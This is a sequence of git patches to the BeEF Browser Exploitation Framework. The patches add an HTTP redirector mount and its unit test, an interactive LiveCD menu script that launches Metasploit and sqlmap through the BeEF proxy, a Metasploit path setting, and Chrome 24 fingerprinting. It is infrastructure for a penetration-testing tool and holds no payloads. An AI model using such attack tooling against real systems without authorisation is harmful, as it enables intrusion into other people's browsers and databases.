From: Christian Frichot <xntrik@gmail.com>
Date: Sun, 20 Jan 2013 16:59:01 +0800
Subject: [PATCH 155/397] New bind_redirect method added to the AssetHandler.
 See #664

---
 core/bootstrap.rb                             |  1 +
 core/main/network_stack/assethandler.rb       |  9 +++
 .../main/network_stack/handlers/redirector.rb | 41 ++++++++++++
 .../main/network_stack/handlers/redirector.rb | 66 +++++++++++++++++++
 test/unit/ts_unit.rb                          |  2 +
 5 files changed, 119 insertions(+)
 create mode 100644 core/main/network_stack/handlers/redirector.rb
 create mode 100644 test/unit/core/main/network_stack/handlers/redirector.rb

diff --git a/core/bootstrap.rb b/core/bootstrap.rb
index 8d227cee6..cf23f03e3 100644
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -24,6 +24,7 @@ require 'core/main/handlers/browserdetails'
 
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/handlers/redirector'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 
diff --git a/core/main/network_stack/assethandler.rb b/core/main/network_stack/assethandler.rb
index 48667fdd1..a4304cc10 100644
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -24,6 +24,15 @@ module Handlers
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
 
+    def bind_redirect(target, path=nil)
+      url = build_url(path,nil)
+      @allocations[url] = {'target' => target}
+      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
+      @http_server.remap
+      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
+      url
+    end
+
     # Binds a file to a mount point
     # @param [String] file File path to asset
     # @param [String] path URL path to mount the asset to (can be nil for random path)
diff --git a/core/main/network_stack/handlers/redirector.rb b/core/main/network_stack/handlers/redirector.rb
new file mode 100644
index 000000000..949cdd535
--- /dev/null
+++ b/core/main/network_stack/handlers/redirector.rb
@@ -0,0 +1,41 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
+        class Redirector
+
+	        @target = "" 	
+
+	        def initialize(target)
+	        	@target = target
+	        end
+
+	        def call(env)
+	        	@response = Rack::Response.new(
+	        		body = ['302 found'],
+	        		status = 302,
+	        		header = {
+	        			'Content-Type' => 'text',
+	        			'Location' => @target
+	        		}
+	        	)
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end
diff --git a/test/unit/core/main/network_stack/handlers/redirector.rb b/test/unit/core/main/network_stack/handlers/redirector.rb
new file mode 100644
index 000000000..ffdc214dc
--- /dev/null
+++ b/test/unit/core/main/network_stack/handlers/redirector.rb
@@ -0,0 +1,66 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'test/unit'
+require 'rubygems'
+require 'curb'
+
+class TC_Redirector < Test::Unit::TestCase
+
+  @@port = 20000 + rand(10000)
+
+  def setup
+    $root_dir="../../"
+    $:.unshift File.join( %w{ ../../ } )
+    require 'core/loader'
+    require 'core/main/network_stack/assethandler.rb'
+    require 'core/main/network_stack/handlers/redirector.rb'
+
+    @@port += 1 # cycle through ports because the tcp teardown process is too slow
+    @port = @@port
+
+    config = {}
+    config[:BindAddress] = '127.0.0.1'
+    config[:Port] = @port.to_s
+    @mounts = {}
+    @mounts['/test'] = BeEF::Core::NetworkStack::Handlers::Redirector.new('http://www.beefproject.com')
+    @rackApp = Rack::URLMap.new(@mounts)
+    Thin::Logging.silent = true
+    @server = Thin::Server.new('127.0.0.1', @port.to_s, @rackApp)
+    trap("INT") { @server.stop }
+    trap("TERM") { @server.stop }
+
+    @pid = fork do
+      @server.start!
+    end
+  end
+
+  def teardown
+    Process.kill("INT",@pid)
+    $root_dir = nil
+  end
+
+  # the server doesn't offer a mutex or callback
+  def wait_for_server
+    max_waits = 3
+    sleep_length = 0.1
+
+    count = 0
+    while (count < max_waits)
+      break if @server.running?
+      count += 1
+      sleep sleep_length
+    end
+  end
+
+  def test_get
+    wait_for_server
+    response = Curl::Easy.http_get("http://127.0.0.1:" + @port.to_s + "/test/")
+    assert_equal 302, response.response_code
+    assert_equal "302 found", response.body_str
+    assert_match /Location: http:\/\/www\.beefproject\.com/, response.header_str
+  end
+
+end
diff --git a/test/unit/ts_unit.rb b/test/unit/ts_unit.rb
index 109e99ba6..f64dee109 100644
--- a/test/unit/ts_unit.rb
+++ b/test/unit/ts_unit.rb
@@ -9,6 +9,7 @@ require '../common/ts_common'
 
 require './core/filter/tc_base'
 require './core/filter/tc_command'
+require './core/main/network_stack/handlers/redirector'
 require './core/tc_loader'
 require './core/tc_core'
 require './core/tc_api'
@@ -53,6 +54,7 @@ class TS_BeefTests
     suite << TC_Hackverter.suite
     suite << TC_EventLogger.suite
 	suite << TC_Hooks.suite
+    suite << TC_Redirector.suite
 
     return suite
   end

From 2d9b894a3cea1709c7eb7a11c0034df7a3f4684e Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sun, 20 Jan 2013 17:03:26 +0800
Subject: [PATCH 156/397] Added some further comments to the new AssetHandler
 redirector. See #664

---
 core/main/network_stack/assethandler.rb        | 5 +++++
 core/main/network_stack/handlers/redirector.rb | 1 +
 2 files changed, 6 insertions(+)

diff --git a/core/main/network_stack/assethandler.rb b/core/main/network_stack/assethandler.rb
index a4304cc10..fdd8ebff2 100644
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -24,6 +24,11 @@ module Handlers
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
 
+    # Binds a redirector to a mount point
+    # @param [String] target The target for the redirector
+    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
+    # @return [String] URL Path of the redirector
+    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
     def bind_redirect(target, path=nil)
       url = build_url(path,nil)
       @allocations[url] = {'target' => target}
diff --git a/core/main/network_stack/handlers/redirector.rb b/core/main/network_stack/handlers/redirector.rb
index 949cdd535..643d59f53 100644
--- a/core/main/network_stack/handlers/redirector.rb
+++ b/core/main/network_stack/handlers/redirector.rb
@@ -9,6 +9,7 @@ module BeEF
       module Handlers
 
         # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
+        # @todo Add new options to specify what kind of redirect you want to achieve
         class Redirector
 
 	        @target = "" 	

From 56d6b54d0872f7a0650e08908d6bd80e747bfc6b Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Tue, 22 Jan 2013 09:53:51 +1000
Subject: [PATCH 157/397] BeEFLive - New Menu

replaces the old tree/Q&A style for a menu presenting all options
---
 liveCD/BeEFLive.sh | 251 +++++++++++++++++++++++++++++----------------
 1 file changed, 161 insertions(+), 90 deletions(-)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index be85fec51..7180fc74c 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -17,70 +17,7 @@
 # to enable SSH etc. The script also make it easy for the user to update/start 
 # the BeEF server
 #
-clear
-echo "======================================"
-echo "          BeEF Live CD   "
-echo "======================================"
-echo ""
-echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net"
-echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
-echo "See the file 'home/beef/doc/COPYING' for copying permission"
-echo ""
 
-echo "Welcome to the BeEF Live CD" 
-echo "" 
-echo ""
-
-#
-# Check for SSH Host Keys - if they do not exist ask user if they should be 
-# created (remastersys has a habit of deleting them during Live CD Creation)
-#
-f1="/etc/ssh/ssh_host_rsa_key"
-if [ -f $f1 ]
-then
-	echo ""
-else 
-	echo -n "Would you like to enable ssh (y/N)? "
-	read var
-	
-	if [ $var = "y" ] ; then
-		 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
-		 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
-		 echo ""
-		 echo "Please provide a password for ssh user: beef"
-		 sudo passwd beef
-		 echo "ssh enabled"
-	fi
-fi
-echo ""
-
-#
-# Prompt the user if they would like to update BeEF and 
-# other components installed (such as sqlmap and msf)
-#
-echo -n "Check and install updates for BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	 cd /opt/beef
-	 git stash
-	 git pull
-fi
-echo ""
-
-echo -n "Check and install updates for msf and sqlmap (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
- 	 cd /opt/sqlmap
- 	 git stash
-	 git pull
-	 cd /opt/metasploit-framework
-	 git stash
-	 git pull
-fi
- 
- 
 #
 # Create a shortcut in the user's home folder to BeEF, msf and sqlmap
 # (if they do not yet exist)
@@ -95,42 +32,176 @@ else
 fi
 
 #
-# Prompt the user if they would like start BeEF
+# function to allow BeEF to run in the background
 #
-echo -n "Start BeEF (y/N)? "
-read var
-
-#
-# function to allow beef to run in the background
-#
-run_beef() {
-    echo ""
-	echo "Starting BeEF..";
-	
+run_beef() {	
 	cd /opt/beef/
 	ruby beef -x
 }
 
-if [ $var = "y" ] ; then
-	run_beef &
-	sleep 5
-fi
+# set default values
+bac="0"
 
 #
-# Prompt the user if they would like start sqlmap using beef as proxy
+# User Menu Loop
 #
-
-echo ""
-echo -n "Start sqlMAP with BeEF Proxy? (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
+while true; do
+	clear
+	echo "======================================"
+	echo "          BeEF Live CD   "
+	echo "======================================"
 	echo ""
-	echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
-	echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
-	sleep 5
-	python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
-fi
+	echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
+	echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+	echo "See the file 'home/beef/doc/COPYING' for copying permission"
+	echo ""
+	
+	echo "Welcome to the BeEF Live CD" 
+	echo "" 
+	
+	
+	#
+	# Check for SSH Host Keys - if they do not exist SSH will be displayed as disabled 
+	# (remastersys has a habit of deleting them during Live CD Creation)
+	#
+	f1="/etc/ssh/ssh_host_rsa_key"
+	if [ -f $f1 ] ; then
+		echo "[1] Disable SSH                              [Currently Enabled]"
+	else 
+		echo "[1] Enable SSH                               [Currently Disabled]"
+	fi
+	
+		echo "[2] Update BeEF"
+		echo "[3] Update sqlMap                            (Bundled with LiveCD)"
+		echo "[4] Update metasploit-framework              (Bundled with LiveCD)"
+		echo ""
+	if [ "$bac" = "1" ] ; then
+		echo "[5] Disable BeEF in background mode          [Currently Enabled]"
+	else
+		echo "[5] Enable BeEF in background mode           [Currently Disabled]"
+	fi
+	
+	if [ "$bac" = "1" ] ; then
+		echo "[6] Disable sqlMap demo                      [Currently Enabled]"
+	else
+		echo "[6] Enable sqlMap demo                       [Currently Disabled]"
+	fi
+	
+		#echo "[7] Enable metasploit-framework integration  [Currently Disabled]"
+		echo ""
+		echo "[q] Quit to terminal"
+		echo ""
+		echo "[b] Run BeEF"
+		echo ""
+		echo -n "BeEF Live ~# "
+		read var
+	
+	#
+	# Quit liveCD loop
+	#	
+	if [ $var = "q" ] ; then
+		 exit
+	fi
+	
+	#
+	# Create SSH Keys to enable SSH or Delete the Keys to disable
+	#
+	if [ $var = "1" ] ; then
+		if [ -f $f1 ]
+		then
+			sudo rm /etc/ssh/ssh_host_rsa_key
+			sudo rm /etc/ssh/ssh_host_dsa_key 
+		else
+			 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+			 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+			 echo ""
+			 echo "Please provide a password for ssh user: beef"
+			 sudo passwd beef
+			 echo "ssh enabled"
+		 fi
+	fi
+	
+	#
+	# Update BeEF from github repository
+	#	
+	if [ $var = "2" ] ; then
+		 cd /opt/beef
+		 git stash
+		 git pull
+	fi
+	
+	#
+	# Update sqlmap from github repository
+	#	
+	if [ $var = "3" ] ; then
+		 cd /opt/sqlmap
+	 	 git stash
+		 git pull
+	fi
+	
+	#
+	# Update msf from github repository
+	#
+	if [ $var = "4" ] ; then
+		 cd /opt/metasploit-framework
+		 git stash
+		 git pull
+	fi
+	
+	#
+	# set BeEF to run in the background
+	#
+	if [ $var = "5" ] ; then
+		if [ "$bac" = "1" ] ; then
+		 	bac="0"
+		 	# check and disable sqlmap (requires beef run in the background)
+		 	sqlm="0"
+		else 
+			bac="1"
+		fi
+	fi
+	
+	#
+	# enable the sqlmap demo
+	#
+	if [ $var = "6" ] ; then
+		if [ "$sqlm" = "1" ] ; then
+		 	sqlm="0"
+		else 
+			sqlm="1"
+			# requires BeEF be run in the background
+			bac="1"
+		fi
+	fi
+	
+	#
+	# Run BeEF
+	#
+	if [ $var = "b" ] ; then
+		if [ "$bac" = "1" ] ; then
+		 	run_beef &
+			sleep 5
+			echo ""
+			echo "BeEF is running in the background, returning to the menu or running something else now..."
+			sleep 5
+			
+			#
+			# If the user has enabled it start sqlmap using beef as proxy
+			#
+			if [ $sqlm = "1" ] ; then
+				echo ""
+				echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
+				echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
+				sleep 5
+				python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
+			fi
+		else 
+			cd /opt/beef/
+			ruby beef -x
+		fi
+	fi	
+		
+done
 
 
 

From d81dc8044e2d5f6c5cab60af13949695b6ba6782 Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Tue, 22 Jan 2013 09:57:43 +1000
Subject: [PATCH 158/397] LiveCD - fixed a bug in menu display showing sqlmap
 enabled

---
 liveCD/BeEFLive.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index 7180fc74c..dfd189481 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -81,7 +81,7 @@ while true; do
 		echo "[5] Enable BeEF in background mode           [Currently Disabled]"
 	fi
 	
-	if [ "$bac" = "1" ] ; then
+	if [ "$sqlm" = "1" ] ; then
 		echo "[6] Disable sqlMap demo                      [Currently Enabled]"
 	else
 		echo "[6] Enable sqlMap demo                       [Currently Disabled]"

From 81be99074ac158b01fd370b946263ad0a0d8bdca Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Wed, 23 Jan 2013 07:08:04 +1000
Subject: [PATCH 159/397] Metasploit extension config - added livecd path

---
 extensions/metasploit/config.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 41f9f406b..5d445f4d2 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -29,6 +29,7 @@ beef:
             auto_msfrpcd_timeout: 120
             msf_path: [ 
               {os: 'osx', path: '/opt/local/msf/'},
+              {os: 'livecd', path: '/opt/metasploit-framework/'},
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},

From 152edc445de574ac49f167ec97b1cfed6963b2d3 Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Wed, 23 Jan 2013 17:09:38 +1000
Subject: [PATCH 160/397] LiveCD - added MSF integration

---
 liveCD/BeEFLive.sh | 403 ++++++++++++++++++++++++++++-----------------
 1 file changed, 249 insertions(+), 154 deletions(-)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index dfd189481..55ca75739 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -39,169 +39,264 @@ run_beef() {
 	ruby beef -x
 }
 
+#
+# function to start msf and run in the background
+#
+run_msf() {	
+	# start msf
+	/opt/metasploit-framework/msfconsole -r /opt/beef/test/thirdparty/msf/unit/BeEF.rc 2> /dev/null
+}
+
+#
+# functions to enable or disable msf integration
+#
+enable_msf() {
+	# enable msf integration in main config file
+	sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\sfalse/metasploit:\n            enable: true/g;P;D' /opt/beef/config.yaml
+	# enable auto_msfrpcd
+	sed -i 's/auto_msfrpcd:\sfalse/auto_msfrpcd: true/g' /opt/beef/extensions/metasploit/config.yaml	
+}
+disable_msf() {
+	# disable msf integration in main config file
+	sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\strue/metasploit:\n            enable: false/g;P;D' /opt/beef/config.yaml
+	# disable auto_msfrpcd
+	sed -i 's/auto_msfrpcd:\strue/auto_msfrpcd: false/g' /opt/beef/extensions/metasploit/config.yaml
+}
+
+#
+# function to exit cleanly
+#
+# trap ctrl-c and call close_bash()
+trap close_bash INT
+
+close_bash() {
+	echo ""	
+	echo "Are you sure you want to exit the LiveCD? (y/N): "
+	read var
+	if [ $var = "y" ] ; then
+		disable_msf
+		exit
+	else		
+		# beef would have quit
+		back_running="0"
+		show_menu
+	fi
+}
+
 # set default values
 bac="0"
 
+# show user menu
+show_menu
+
 #
 # User Menu Loop
 #
-while true; do
-	clear
-	echo "======================================"
-	echo "          BeEF Live CD   "
-	echo "======================================"
-	echo ""
-	echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
-	echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
-	echo "See the file 'home/beef/doc/COPYING' for copying permission"
-	echo ""
-	
-	echo "Welcome to the BeEF Live CD" 
-	echo "" 
-	
-	
-	#
-	# Check for SSH Host Keys - if they do not exist SSH will be displayed as disabled 
-	# (remastersys has a habit of deleting them during Live CD Creation)
-	#
-	f1="/etc/ssh/ssh_host_rsa_key"
-	if [ -f $f1 ] ; then
-		echo "[1] Disable SSH                              [Currently Enabled]"
-	else 
-		echo "[1] Enable SSH                               [Currently Disabled]"
-	fi
-	
-		echo "[2] Update BeEF"
-		echo "[3] Update sqlMap                            (Bundled with LiveCD)"
-		echo "[4] Update metasploit-framework              (Bundled with LiveCD)"
+show_menu() {
+	while true; do
+		clear
+		echo "======================================"
+		echo "          BeEF Live CD   "
+		echo "======================================"
 		echo ""
-	if [ "$bac" = "1" ] ; then
-		echo "[5] Disable BeEF in background mode          [Currently Enabled]"
-	else
-		echo "[5] Enable BeEF in background mode           [Currently Disabled]"
-	fi
-	
-	if [ "$sqlm" = "1" ] ; then
-		echo "[6] Disable sqlMap demo                      [Currently Enabled]"
-	else
-		echo "[6] Enable sqlMap demo                       [Currently Disabled]"
-	fi
-	
-		#echo "[7] Enable metasploit-framework integration  [Currently Disabled]"
+		echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
+		echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+		echo "See the file 'home/beef/doc/COPYING' for copying permission"
 		echo ""
-		echo "[q] Quit to terminal"
-		echo ""
-		echo "[b] Run BeEF"
-		echo ""
-		echo -n "BeEF Live ~# "
-		read var
-	
-	#
-	# Quit liveCD loop
-	#	
-	if [ $var = "q" ] ; then
-		 exit
-	fi
-	
-	#
-	# Create SSH Keys to enable SSH or Delete the Keys to disable
-	#
-	if [ $var = "1" ] ; then
-		if [ -f $f1 ]
-		then
-			sudo rm /etc/ssh/ssh_host_rsa_key
-			sudo rm /etc/ssh/ssh_host_dsa_key 
-		else
-			 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
-			 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
-			 echo ""
-			 echo "Please provide a password for ssh user: beef"
-			 sudo passwd beef
-			 echo "ssh enabled"
-		 fi
-	fi
-	
-	#
-	# Update BeEF from github repository
-	#	
-	if [ $var = "2" ] ; then
-		 cd /opt/beef
-		 git stash
-		 git pull
-	fi
-	
-	#
-	# Update sqlmap from github repository
-	#	
-	if [ $var = "3" ] ; then
-		 cd /opt/sqlmap
-	 	 git stash
-		 git pull
-	fi
-	
-	#
-	# Update msf from github repository
-	#
-	if [ $var = "4" ] ; then
-		 cd /opt/metasploit-framework
-		 git stash
-		 git pull
-	fi
-	
-	#
-	# set BeEF to run in the background
-	#
-	if [ $var = "5" ] ; then
-		if [ "$bac" = "1" ] ; then
-		 	bac="0"
-		 	# check and disable sqlmap (requires beef run in the background)
-		 	sqlm="0"
-		else 
-			bac="1"
-		fi
-	fi
-	
-	#
-	# enable the sqlmap demo
-	#
-	if [ $var = "6" ] ; then
-		if [ "$sqlm" = "1" ] ; then
-		 	sqlm="0"
-		else 
-			sqlm="1"
-			# requires BeEF be run in the background
-			bac="1"
-		fi
-	fi
-	
-	#
-	# Run BeEF
-	#
-	if [ $var = "b" ] ; then
-		if [ "$bac" = "1" ] ; then
-		 	run_beef &
-			sleep 5
-			echo ""
-			echo "BeEF is running in the background, returning to the menu or running something else now..."
-			sleep 5
-			
-			#
-			# If the user has enabled it start sqlmap using beef as proxy
-			#
-			if [ $sqlm = "1" ] ; then
-				echo ""
-				echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
-				echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
-				sleep 5
-				python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
-			fi
-		else 
-			cd /opt/beef/
-			ruby beef -x
-		fi
-	fi	
 		
-done
+		echo "Welcome to the BeEF Live CD" 
+		echo "" 
+		
+		
+		#
+		# Check for SSH Host Keys - if they do not exist SSH will be displayed as disabled 
+		# (remastersys has a habit of deleting them during Live CD Creation)
+		#
+		f1="/etc/ssh/ssh_host_rsa_key"
+		if [ -f $f1 ] ; then
+			echo "[1] Disable SSH                              [Currently Enabled]"
+		else 
+			echo "[1] Enable SSH                               [Currently Disabled]"
+		fi
+		
+			echo "[2] Update BeEF"
+			echo "[3] Update sqlMap                            (Bundled with LiveCD)"
+			echo "[4] Update metasploit-framework              (Bundled with LiveCD)"
+			echo ""
+		if [ "$bac" = "1" ] ; then
+			echo "[5] Disable BeEF in background mode          [Currently Enabled]"
+		else
+			echo "[5] Enable BeEF in background mode           [Currently Disabled]"
+		fi
+		
+		if [ "$sqlm" = "1" ] ; then
+			echo "[6] Disable sqlMap demo                      [Currently Enabled]"
+		else
+			echo "[6] Enable sqlMap demo                       [Currently Disabled]"
+		fi
+		
+		if [ "$msf" = "1" ] ; then
+			echo "[7] Disable metasploit-framework integration [Currently Enabled]"
+		else
+			echo "[7] Enable metasploit-framework integration  [Currently Disabled]"
+		fi
+			echo ""
+			echo "[q] Quit to terminal"
+			echo ""
+		if [ "$back_running" = "1" ] ; then	
+			echo "[k] End BeEF process [BeEF running in background mode]"
+		else
+			echo "[b] Run BeEF"
+		fi
+			echo ""
+			echo -n "BeEF Live ~# "
+			read var
+		
+		#
+		# Quit liveCD loop
+		#	
+		if [ $var = "q" ] ; then
+			 close_bash
+		fi
+		
+		#
+		# Create SSH Keys to enable SSH or Delete the Keys to disable
+		#
+		if [ $var = "1" ] ; then
+			if [ -f $f1 ]
+			then
+				sudo rm /etc/ssh/ssh_host_rsa_key
+				sudo rm /etc/ssh/ssh_host_dsa_key 
+			else
+				 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+				 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+				 echo ""
+				 echo "Please provide a password for ssh user: beef"
+				 sudo passwd beef
+				 echo "ssh enabled"
+			 fi
+		fi
+		
+		#
+		# Update BeEF from github repository
+		#	
+		if [ $var = "2" ] ; then
+			 cd /opt/beef
+			 git stash
+			 git pull
+			 msf="0"
+		fi
+		
+		#
+		# Update sqlmap from github repository
+		#	
+		if [ $var = "3" ] ; then
+			 cd /opt/sqlmap
+		 	 git stash
+			 git pull
+		fi
+		
+		#
+		# Update msf from github repository
+		#
+		if [ $var = "4" ] ; then
+			 cd /opt/metasploit-framework
+			 git stash
+			 git pull
+		fi
+		
+		#
+		# set BeEF to run in the background
+		#
+		if [ $var = "5" ] ; then
+			if [ "$bac" = "1" ] ; then
+			 	bac="0"
+			 	# check and disable sqlmap (requires beef run in the background)
+			 	sqlm="0"
+			else 
+				bac="1"
+			fi
+		fi
+		
+		#
+		# enable the sqlmap demo
+		#
+		if [ $var = "6" ] ; then
+			if [ "$sqlm" = "1" ] ; then
+			 	sqlm="0"
+			else 
+				sqlm="1"
+				# requires BeEF be run in the background
+				bac="1"
+			fi
+		fi
+		
+		#
+		# enable the msf integration
+		#
+		if [ $var = "7" ] ; then
+			if [ "$msf" = "1" ] ; then
+			 	msf="0"
+			 	disable_msf
+			else 
+				msf="1"
+				enable_msf
+			fi
+		fi
+		
+		#
+		# end background beef process
+		#
+		if [ $var = "k" ] ; then
+			pkill -x 'ruby'
+			back_running="0"
+		fi
+		
+		#
+		# Run BeEF
+		#
+		if [ $var = "b" ] ; then
+			
+			if [ "$msf" = "1" ] ; then
+				#
+				# First start msf if it is enabled
+				#
+				printf "Starting MSF (wait 45 seconds)..."
+				run_msf &
+				sleep 45
+			fi
+			
+			if [ "$bac" = "1" ] ; then
+				#
+				# run beef in the background
+				#
+			 	run_beef &
+				sleep 5
+				echo ""
+				echo "BeEF is running in the background, returning to the menu or running something else now..."
+				sleep 5
+				back_running="1"
+				#
+				# If the user has enabled it start sqlmap using beef as proxy
+				#
+				if [ $sqlm = "1" ] ; then
+					echo ""
+					echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
+					echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
+					sleep 5
+					python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
+				fi
+			else 
+				#
+				# run beef in the foreground
+				#
+				cd /opt/beef/
+				ruby beef -x
+			fi
+		fi	
+			
+	done
+}
 
 
 

From 3433e44d747ecb060d97fac75b977bc5108ef6cb Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Wed, 23 Jan 2013 17:20:33 +1000
Subject: [PATCH 161/397] LiveCD - improved interrupt capture

---
 liveCD/BeEFLive.sh | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index 55ca75739..2bdc4941f 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -67,8 +67,13 @@ disable_msf() {
 # function to exit cleanly
 #
 # trap ctrl-c and call close_bash()
-trap close_bash INT
+trap close_bash_t INT
 
+close_bash_t() {
+	# beef would have quit
+	back_running="0"
+	close_bash
+}
 close_bash() {
 	echo ""	
 	echo "Are you sure you want to exit the LiveCD? (y/N): "
@@ -77,8 +82,6 @@ close_bash() {
 		disable_msf
 		exit
 	else		
-		# beef would have quit
-		back_running="0"
 		show_menu
 	fi
 }
@@ -86,8 +89,7 @@ close_bash() {
 # set default values
 bac="0"
 
-# show user menu
-show_menu
+
 
 #
 # User Menu Loop
@@ -274,7 +276,7 @@ show_menu() {
 				sleep 5
 				echo ""
 				echo "BeEF is running in the background, returning to the menu or running something else now..."
-				sleep 5
+				sleep 15
 				back_running="1"
 				#
 				# If the user has enabled it start sqlmap using beef as proxy
@@ -298,6 +300,8 @@ show_menu() {
 	done
 }
 
+# show user menu
+show_menu
 
 
 

From e321d6e3d80ce7acc8ec3ed9b1b529cef1fc8f9f Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 23 Jan 2013 11:39:26 +0000
Subject: [PATCH 162/397] Added support for Chrome 24

---
 core/main/client/browser.js | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index cf223f5bd..a5089585a 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -413,12 +413,20 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==23)?true:false);
     },
 
+    /**
+     * Returns true if Chrome 24.
+     * @example: beef.browser.isC24()
+     */
+    isC24: function() {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==24)?true:false);
+    },
+
 	/**
 	 * Returns true if Chrome.
 	 * @example: beef.browser.isC()
 	 */
 	isC: function() {
-		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23();
+		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24();
 	},
 
 	/**
